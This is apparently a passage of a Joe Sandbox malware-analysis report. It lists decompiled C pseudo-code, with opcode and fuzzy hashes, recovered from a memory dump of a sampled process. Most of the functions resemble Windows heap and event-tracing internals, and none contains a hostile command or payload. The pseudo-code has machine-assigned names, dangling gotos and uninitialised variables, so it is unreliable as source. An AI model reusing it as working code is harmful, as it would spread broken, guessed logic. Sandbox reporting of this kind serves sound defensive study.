                            • Opcode Fuzzy Hash: b8eec60907c98f204d11bcb99b1f554de475fba4e7b43e726df1acdac74b1fbd
                            • Instruction Fuzzy Hash: BBF0203A4116DA4BEE32FFE831012E22FD9C746114B1D09C1D490DB209D9388883CA25
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E037C4F2E(void* __ecx, char _a4) {
                            				void* __esi;
                            				void* __ebp;
                            				void* _t17;
                            				void* _t19;
                            				void* _t20;
                            				void* _t21;
                            
                            				_t18 = __ecx;
                            				_t21 = __ecx;
                            				if(__ecx == 0) {
                            					L6:
                            					__eflags = _a4;
                            					if(__eflags != 0) {
                            						L8:
                            						E038988F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                            						L9:
                            						return 0;
                            					}
                            					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                            					if(__eflags != 0) {
                            						goto L9;
                            					}
                            					goto L8;
                            				}
                            				_t18 = __ecx + 0x30;
                            				if(E037EC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x37a1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                            					goto L6;
                            				} else {
                            					return 1;
                            				}
                            			}










                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4bae7ea978400e34396d7b70fa49e43bee92dd5ca9686eb700eeab5556daa6cb
                            • Instruction ID: 0b92dce91c61986f181414dc2b00779990ddfd99cea7604141917e4b2e537919
                            • Opcode Fuzzy Hash: 4bae7ea978400e34396d7b70fa49e43bee92dd5ca9686eb700eeab5556daa6cb
                            • Instruction Fuzzy Hash: 71F0E2B65217A88FE771C798C144B22BBD9AB0577CF4C44F5E405CB920C724ECC0C680
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 36%
                            			E03898B58(intOrPtr __ecx) {
                            				signed int _v8;
                            				intOrPtr _v20;
                            				short _v46;
                            				char _v52;
                            				signed char* _t11;
                            				intOrPtr _t17;
                            				intOrPtr _t22;
                            				intOrPtr _t23;
                            				intOrPtr _t24;
                            				signed int _t25;
                            
                            				_v8 =  *0x38bd360 ^ _t25;
                            				_v20 = __ecx;
                            				_v46 = 0x1c26;
                            				if(E037E7D50() == 0) {
                            					_t11 = 0x7ffe0386;
                            				} else {
                            					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                            				}
                            				_push( &_v52);
                            				_push(4);
                            				_push(0x402);
                            				_push( *_t11 & 0x000000ff);
                            				return E0380B640(E03809AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                            			}














                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fb2f9c7cc045d45ea11845620337bb2a5945dfead2500784c966f6db7df855c2
                            • Instruction ID: 5b95def7858e5694a053249d1028527b4516c858d727793d702921d777060005
                            • Opcode Fuzzy Hash: fb2f9c7cc045d45ea11845620337bb2a5945dfead2500784c966f6db7df855c2
                            • Instruction Fuzzy Hash: 85F05EB5A04259ABDB04EBE8D906A6EB3A4AB08204F580499AA15EB2D1EB74D900C795
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 88%
                            			E037E746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                            				signed int _t8;
                            				void* _t10;
                            				short* _t17;
                            				void* _t19;
                            				intOrPtr _t20;
                            				void* _t21;
                            
                            				_t20 = __esi;
                            				_t19 = __edi;
                            				_t17 = __ebx;
                            				if( *((char*)(_t21 - 0x25)) != 0) {
                            					if(__ecx == 0) {
                            						E037DEB70(__ecx, 0x38b79a0);
                            					} else {
                            						asm("lock xadd [ecx], eax");
                            						if((_t8 | 0xffffffff) == 0) {
                            							_push( *((intOrPtr*)(__ecx + 4)));
                            							E038095D0();
                            							L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                            							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                            							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                            						}
                            					}
                            					L10:
                            				}
                            				_t10 = _t19 + _t19;
                            				if(_t20 >= _t10) {
                            					if(_t19 != 0) {
                            						 *_t17 = 0;
                            						return 0;
                            					}
                            				}
                            				return _t10;
                            				goto L10;
                            			}










                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 825c3f047f28741b5c748b3cb3f099f413486cb9a61e8bb630cc1f248692b413
                            • Instruction ID: eb63185ebb94bd93f5e8dae0eacf5b66642b54b9a20bf7def4dc170665a526c2
                            • Opcode Fuzzy Hash: 825c3f047f28741b5c748b3cb3f099f413486cb9a61e8bb630cc1f248692b413
                            • Instruction Fuzzy Hash: 62F0E9369012C4AADF19D7BCC840F79BFB5AF0E210F080195E4D1EF161E7259800C785
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 36%
                            			E03898CD6(intOrPtr __ecx) {
                            				signed int _v8;
                            				intOrPtr _v12;
                            				short _v38;
                            				char _v44;
                            				signed char* _t11;
                            				intOrPtr _t17;
                            				intOrPtr _t22;
                            				intOrPtr _t23;
                            				intOrPtr _t24;
                            				signed int _t25;
                            
                            				_v8 =  *0x38bd360 ^ _t25;
                            				_v12 = __ecx;
                            				_v38 = 0x1c2d;
                            				if(E037E7D50() == 0) {
                            					_t11 = 0x7ffe0386;
                            				} else {
                            					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                            				}
                            				_push( &_v44);
                            				_push(0xffffffe4);
                            				_push(0x402);
                            				_push( *_t11 & 0x000000ff);
                            				return E0380B640(E03809AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                            			}














                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b55b5f70a8fdb3176613c8d695615cdbf1cdff44d4294094b9a91d9e8cf62717
                            • Instruction ID: 54eb24877ee64cb76ca0cdcb7752cbc24fbe89213064165e48331199a8241059
                            • Opcode Fuzzy Hash: b55b5f70a8fdb3176613c8d695615cdbf1cdff44d4294094b9a91d9e8cf62717
                            • Instruction Fuzzy Hash: 6EF0E271A0420DABDF04EFE8E845E6EB7B4EF09200F1401DAE912EB2C1EA34D900C754
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E037FA44B(signed int __ecx) {
                            				intOrPtr _t13;
                            				signed int _t15;
                            				signed int* _t16;
                            				signed int* _t17;
                            
                            				_t13 =  *0x38b7b9c; // 0x0
                            				_t15 = __ecx;
                            				_t16 = L037E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                            				if(_t16 == 0) {
                            					return 0;
                            				}
                            				 *_t16 = _t15;
                            				_t17 =  &(_t16[2]);
                            				E0380FA60(_t17, 0, _t15 << 2);
                            				return _t17;
                            			}








                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cbcef7f16d60b3a6d0d2d269372ccd9e120f69beb378f58b21a716a3d732e642
                            • Instruction ID: dfc46d3c6efd5e8c87b3e53137b333eb1f57c3575ec5d16319ced982c4430766
                            • Opcode Fuzzy Hash: cbcef7f16d60b3a6d0d2d269372ccd9e120f69beb378f58b21a716a3d732e642
                            • Instruction Fuzzy Hash: CFE09272A01921ABD2619A58AC00F66B39DEBD8A51F194035F608DB254D628DD01CBE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 79%
                            			E037CF358(void* __ecx, signed int __edx) {
                            				char _v8;
                            				signed int _t9;
                            				void* _t20;
                            
                            				_push(__ecx);
                            				_t9 = 2;
                            				_t20 = 0;
                            				if(E037FF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                            					_t20 = L037E4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                            				}
                            				return _t20;
                            			}







                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                            • Instruction ID: bdc806cbd164e2b56bfa91af04594b69d96472900b1c112930b116332afd96be
                            • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                            • Instruction Fuzzy Hash: ADE0D832A40218BBCB21D6D99D05F9ABBADDB4CB60F04015AF904DB190D5609D00D3D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E037DFF60(intOrPtr _a4) {
                            				void* __ecx;
                            				void* __ebp;
                            				void* _t13;
                            				intOrPtr _t14;
                            				void* _t15;
                            				void* _t16;
                            				void* _t17;
                            
                            				_t14 = _a4;
                            				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x37a11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                            					return E038988F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                            				} else {
                            					return E037E0050(_t14);
                            				}
                            			}











                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f7c51ed418656f8bbec82c567fb6343030be7e0f8d221c8e4ed2b18644b4ceab
                            • Instruction ID: c479af8b5686b7b72f15f62d6ddb6c7ee43e35c1c08bc71ce39eec8292d2bed5
                            • Opcode Fuzzy Hash: f7c51ed418656f8bbec82c567fb6343030be7e0f8d221c8e4ed2b18644b4ceab
                            • Instruction Fuzzy Hash: 6BE026B0205304DFEB34DB96D040F2D77BC9F42729F1D809EE00A4F101C621D880C256
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0387D380(void* __ecx, void* __edx, intOrPtr _a4) {
                            				void* _t5;
                            
                            				if(_a4 != 0) {
                            					_t5 = L037CE8B0(__ecx, _a4, 0xfff);
                            					L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                            					return _t5;
                            				}
                            				return 0xc000000d;
                            			}





                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                            • Instruction ID: 3c8cfc546a640c4851e605662b47461608687cec0978221df575180ef5d86c39
                            • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                            • Instruction Fuzzy Hash: 28E0C235280348BBDB229E84CC00F697B5AEF907A5F104079FE089EA90C675DCA1E6C4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 82%
                            			E038541E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                            				void* _t5;
                            				void* _t14;
                            
                            				_push(8);
                            				_push(0x38a08f0);
                            				_t5 = E0381D08C(__ebx, __edi, __esi);
                            				if( *0x38b87ec == 0) {
                            					E037DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                            					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                            					if( *0x38b87ec == 0) {
                            						 *0x38b87f0 = 0x38b87ec;
                            						 *0x38b87ec = 0x38b87ec;
                            						 *0x38b87e8 = 0x38b87e4;
                            						 *0x38b87e4 = 0x38b87e4;
                            					}
                            					 *(_t14 - 4) = 0xfffffffe;
                            					_t5 = L03854248();
                            				}
                            				return E0381D0D1(_t5);
                            			}






                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9b41fb8303bd4f7b987f7f088adf8f813a7ae4bb07ffc13d4aed4afc49cfad25
                            • Instruction ID: d12751d3dec6ba7e84dca820cdfbb23bf94852c28124b765618cbe85f744a831
                            • Opcode Fuzzy Hash: 9b41fb8303bd4f7b987f7f088adf8f813a7ae4bb07ffc13d4aed4afc49cfad25
                            • Instruction Fuzzy Hash: 3FF01578810BA6CFDBA0EFE9950872837BCF74431AF1081DA9120CB688E7744489CF0A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E037FA185() {
                            				void* __ecx;
                            				intOrPtr* _t5;
                            
                            				if( *0x38b67e4 >= 0xa) {
                            					if(_t5 < 0x38b6800 || _t5 >= 0x38b6900) {
                            						return L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                            					} else {
                            						goto L1;
                            					}
                            				} else {
                            					L1:
                            					return E037E0010(0x38b67e0, _t5);
                            				}
                            			}






                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 12fe66a3948a3994a5aa60ba2959d536356ede484116c43016953b2da7745f27
                            • Instruction ID: 80c087276acdc374e3a248ae0e528a80249f88ae61ead07ac01397cae2ac5c5b
                            • Opcode Fuzzy Hash: 12fe66a3948a3994a5aa60ba2959d536356ede484116c43016953b2da7745f27
                            • Instruction Fuzzy Hash: 94D02B219201051FD61CF3889828B212236F788700F31048CE30B8E7A1FB5088D8950C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E037F16E0(void* __edx, void* __eflags) {
                            				void* __ecx;
                            				void* _t3;
                            
                            				_t3 = E037F1710(0x38b67e0);
                            				if(_t3 == 0) {
                            					_t6 =  *[fs:0x30];
                            					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                            						goto L1;
                            					} else {
                            						return L037E4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                            					}
                            				} else {
                            					L1:
                            					return _t3;
                            				}
                            			}






                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5d885436114a6eede032c684989ec04589cba0200c88544fba5e7f381cfa7867
                            • Instruction ID: 2f9b85b8f335ff991f8e80c3411c99c1e49646d3d13ed1fc2e5b7bb998b7465c
                            • Opcode Fuzzy Hash: 5d885436114a6eede032c684989ec04589cba0200c88544fba5e7f381cfa7867
                            • Instruction Fuzzy Hash: 8DD0A931200200EADE2DDB119808B142266FB80B91F7C00ACF32B9DAC0EFA1DCA2E05C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E038453CA(void* __ebx) {
                            				intOrPtr _t7;
                            				void* _t13;
                            				void* _t14;
                            				intOrPtr _t15;
                            				void* _t16;
                            
                            				_t13 = __ebx;
                            				if( *((char*)(_t16 - 0x65)) != 0) {
                            					E037DEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                            					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                            					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                            				}
                            				if(_t15 != 0) {
                            					L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                            					return  *((intOrPtr*)(_t16 - 0x64));
                            				}
                            				return _t7;
                            			}









                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                            • Instruction ID: c7ed9f6d64620c4fdfa376b5853afdad1b2bc4e8054ba0bdb41760333655ea8f
                            • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                            • Instruction Fuzzy Hash: A4E08C369007849BCF16EB88C654F4EB7F5FB86B00F180098A0089FA20C624AD00CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E037DAAB0() {
                            				intOrPtr* _t4;
                            
                            				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                            				if(_t4 != 0) {
                            					if( *_t4 == 0) {
                            						goto L1;
                            					} else {
                            						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                            					}
                            				} else {
                            					L1:
                            					return 0x7ffe0030;
                            				}
                            			}




                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                            • Instruction ID: 995bde6d752ac27cd68ea3f4cdd06f841bdd1d11f05cf3ae37a499b09c8e1f35
                            • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                            • Instruction Fuzzy Hash: 93D0E939352990CFD65ACB5DC594B1577B8BB44B44FD905D0E501CB761E62CD984CA00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E037F35A1(void* __eax, void* __ebx, void* __ecx) {
                            				void* _t6;
                            				void* _t10;
                            				void* _t11;
                            
                            				_t10 = __ecx;
                            				_t6 = __eax;
                            				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                            					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                            				}
                            				if( *((char*)(_t11 - 0x1a)) != 0) {
                            					return E037DEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                            				}
                            				return _t6;
                            			}






                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                            • Instruction ID: 6b8f773497df6e844b547003809494b03abfe9962211efb494f609e98298d568
                            • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                            • Instruction Fuzzy Hash: 59D0C73D5512849DFF53EB78C11877C7775BB40318F5C106595450BA51C3354959D601
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E037CDB40() {
                            				signed int* _t3;
                            				void* _t5;
                            
                            				_t3 = L037E4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                            				if(_t3 == 0) {
                            					return 0;
                            				} else {
                            					 *_t3 =  *_t3 | 0x00000400;
                            					return _t3;
                            				}
                            			}





                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                            • Instruction ID: ea9fa2a034b4b42b42d511e09386e6f1992e3193b96da51dfe986ba0b7d589d1
                            • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                            • Instruction Fuzzy Hash: 51C08C30290B40AAEB329F20CD01B0076A0BB00B01F4800A46300DA0F0EB78DC01EA00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0384A537(intOrPtr _a4, intOrPtr _a8) {
                            
                            				return L037E8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                            			}



                            0x0384a553

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                            • Instruction ID: aa226747bf3e77207f68d4b815ec78d67e57978c0169446ed5a36f7ae0c21485
                            • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                            • Instruction Fuzzy Hash: 45C08C37080248BBCB12AF81CC00F167F2AFB98B60F008010FA080F570C632E970EB85
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E037E3A1C(intOrPtr _a4) {
                            				void* _t5;
                            
                            				return L037E4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                            			}




                            0x037e3a35

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                            • Instruction ID: c0e3d95848de7c98e8852d7daeda4f692802bfa7257c596baae3e20e9c2bf4c9
                            • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                            • Instruction Fuzzy Hash: E5C08C32080248BBCB12AE42DC00F017B29E794B60F000020B6040A5608532EC60D58C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E037D76E2(void* __ecx) {
                            				void* _t5;
                            
                            				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                            					return L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                            				}
                            				return _t5;
                            			}




                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                            • Instruction ID: 2d274208eaef6b4c5fc7f5d9f2bdfcd92eb8a7266afbba6f97f0524a7f825a60
                            • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                            • Instruction Fuzzy Hash: 6FC08C741412C05AEB2EDB08CE24B20B664AB08608F4C019CAA010D4A1D368A812C208
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E037F36CC(void* __ecx) {
                            
                            				if(__ecx > 0x7fffffff) {
                            					return 0;
                            				} else {
                            					return L037E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                            				}
                            			}



                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
